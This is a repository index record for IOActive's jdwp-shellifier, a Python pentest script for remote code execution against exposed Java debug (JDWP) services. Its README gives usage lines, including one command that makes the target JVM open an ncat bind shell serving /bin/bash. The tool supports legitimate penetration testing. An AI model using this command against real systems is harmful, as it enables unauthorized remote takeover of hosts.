{"id":13844515,"url":"https://github.com/IOActive/jdwp-shellifier","last_synced_at":"2025-07-11T23:33:26.512Z","repository":{"id":15822770,"uuid":"18562546","full_name":"IOActive/jdwp-shellifier","owner":"IOActive","description":null,"archived":false,"fork":false,"pushed_at":"2023-12-24T15:02:18.000Z","size":16,"stargazers_count":815,"open_issues_count":6,"forks_count":275,"subscribers_count":50,"default_branch":"master","last_synced_at":"2024-08-05T17:42:20.244Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/IOActive.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2014-04-08T14:57:53.000Z","updated_at":"2024-08-01T17:57:40.000Z","dependencies_parsed_at":"2022-07-15T05:00:41.602Z","dependency_job_id":null,"html_url":"https://github.com/IOActive/jdwp-shellifier","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/IOActive%2Fjdwp-shellifier","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/IOActive%2Fjdwp-shellifier/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/IOActive%2Fjdwp-shellifier/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/IOActive%2Fjdwp-shellifier/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/IOActive","download_url":"https://codeload.github.com/IOActive/jdwp-shellifier/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":225772631,"owners_count":17521868,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-04T17:02:44.152Z","updated_at":"2024-11-21T17:30:17.836Z","avatar_url":"https://github.com/IOActive.png","language":"Python","funding_links":[],"categories":["Python (1887)","Python"],"sub_categories":[],"readme":"# JDWP exploitation script\n\n## What is it ?\nThis exploitation script is meant to be used by pentesters against active JDWP service, in order to gain Remote Code Execution.\n\n## How does it work ?\nWell, in a pretty standard way, the script only requires a Python 2 interpreter:\n\n\t% python ./jdwp-shellifier.py -h\n\tusage: jdwp-shellifier.py [-h] -t IP [-p PORT] [--break-on JAVA_METHOD]\n                          [--cmd COMMAND]\n\n    Universal exploitation script for JDWP by @_hugsy_\n\n    optional arguments:\n    -h, --help            show this help message and exit\n    -t IP, --target IP    Remote target IP (default: None)\n    -p PORT, --port PORT  Remote target port (default: 8000)\n    --break-on JAVA_METHOD\n    Specify full path to method to break on (default:\n    \tjava.net.ServerSocket.accept)\n    \t--cmd COMMAND         Specify full path to method to break on (default:\n    \t\tNone)\n\nTo target a specific host/port:\n\n\t$ python ./jdwp-shellifier.py -t my.target.ip -p 1234\n\t\nThis command will only inject Java code on the JVM and show some info like Operating System, Java version. Since it does not execute external code/binary, it is totally safe and can be used as Proof-Of-Concept\n\n\t$ python ./jdwp-shellifier.py -t my.target.ip -p 1234 --cmd \"ncat -v -l -p 1234 -e /bin/bash\"\n\t\nThis command will actually execute the process `ncat` with the specified argument with the rights given to the running JVM.\n\nBefore sending questions, make sure to read http://blog.ioactive.com/2014/04/hacking-java-debug-wire-protocol-or-how.html for full understanding of the JDWP protocol. \n\n## Thanks\n* Ilja Van Sprundel\n* Sebastien Macke\n\n\n\n\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FIOActive%2Fjdwp-shellifier","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FIOActive%2Fjdwp-shellifier","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FIOActive%2Fjdwp-shellifier/lists"}